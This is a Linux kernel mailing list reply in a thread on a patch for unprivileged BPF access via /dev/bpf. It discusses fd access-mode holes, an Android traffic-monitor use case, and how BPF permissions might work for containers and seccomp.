Re: [PATCH v2 bpf-next 1/4] bpf: unprivileged BPF access via /dev/bpf
From: Andy Lutomirski <luto@kernel.org>
Date: 2019-08-22 15:16:28
Also in:
bpf, linux-security-module, netdev
Possibly related (same subject, not in this thread)
- 2019-06-28 · Re: [PATCH v2 bpf-next 1/4] bpf: unprivileged BPF access via /dev/bpf · Christian Brauner <christian@brauner.io>
- 2019-06-27 · Re: [PATCH v2 bpf-next 1/4] bpf: unprivileged BPF access via /dev/bpf · Andy Lutomirski <luto@kernel.org>
On Thu, Aug 22, 2019 at 7:17 AM Daniel Borkmann [off-list ref] wrote:
On 8/7/19 7:24 AM, Andy Lutomirski wrote:quoted
On Mon, Aug 5, 2019 at 6:11 PM Alexei Starovoitov [off-list ref] wrote:quoted
On Mon, Aug 05, 2019 at 02:25:35PM -0700, Andy Lutomirski wrote:quoted
It tries to make the kernel respect the access modes for fds. Without this patch, there seem to be some holes: nothing looked at program fds and, unless I missed something, you could take a readonly fd for a program, pin the program, and reopen it RW.I think it's by design. iirc Daniel had a use case for something like this.That seems odd. Daniel, can you elaborate?[ ... catching up late. ] Not from my side, the change was added by Chenbo back then for Android use-case to replace xt_qtaguid and xt_owner with BPF programs and to allow unprivileged applications to read maps. More on their architecture: https://source.android.com/devices/tech/datausage/ebpf-traffic-monitor From the cover-letter: [...] The network-control daemon (netd) creates and loads an eBPF object for network packet filtering and analysis. It passes the object FD to an unprivileged network monitor app (netmonitor), which is not allowed to create, modify or load eBPF objects, but is allowed to read the traffic stats from the map. [...]
I suspect that this use case is, in fact, mostly broken in current kernels. An unprivileged process with a read-only fd to a bpf map can BPF_OBJ_PIN the map and then re-open it read-write. As far as I can tell, the only thing mitigating this is that it won't work unless the attacker has write access to some directory in bpffs.
quoted
Trusted by whom? In a non-nested container, the container manager *might* be trusted by the outside world. In a *nested* container, unless the inner container management is controlled from outside the outer container, it's not trusted. I don't know much about how Facebook's containers work, but the LXC/LXD/Podman world is moving very strongly toward user namespaces and maximally-untrusted containers, and I think bpf() should work in that context.[...] and if we opt-in with CAP_NET_ADMIN, for example, then it should ideally be possible for that container to install BPF programs for mangling, dropping, forwarding etc as long as it's only affecting it's /own/ netns like the rest of networking subsystem controls that work in that case. I would actually like to get to this at some point and make it more approachable as long as there is a way for an admin to /opt into it/ via policy (aka not by default).
For better or for worse, I think this would need a massive re-architecting of the way bpf filtering works. bpf filters attach to cgroups, which aren't scoped to network namespaces at all. So we need a different permission model.
Thinking out loud, I'd
love some sort of a hybrid, that is, a mixture of CAP_BPF_ADMIN and
customizable seccomp policy. Meaning, there could be several CAP_BPF
type sub-policies e.g. from allowing everything (equivalent to the
/dev/bpf on/off handle or CAP_SYS_ADMIN we have today) down to
programmable user defined policy that can be tailored to specific
needs like granting apps to BPF_OBJ_GET and BPF_MAP_LOOKUP elements
or granting to load+mangle a specific subset of maps (e.g. BPF_MAP_TYPE_{ARRAY,
HASH,LRU_HASH,LPM_TRIE}) and prog types (...) plus attaching them to
their own netns, and if that is untrusted, then same restrictions/
mitigations could be done by the verifier as with (current) unprivileged
BPF, enabled via programmable policy as well. We wouldn't make any
static/fixed assumptions, but allow users to define them based on their
own use-cases. Haven't looked how feasible this would be, but something
to take into consideration when we rework the current [admittedly
suboptimal all-or-nothing] model we have. Is this something you had in
mind as well for your wip proposal, Andy?Hmm. Fine-grained seccomp stuff like this is very much in scope for the seccomp discussion that's happening at LPC this year. Unfortunately, I'm not there, but I'm participating via the mailing list. I also finally finished typing a very rough draft of my bpf ideas. I'll email them out momentarily in a separate email. I think it should come fairly close to doing what you want.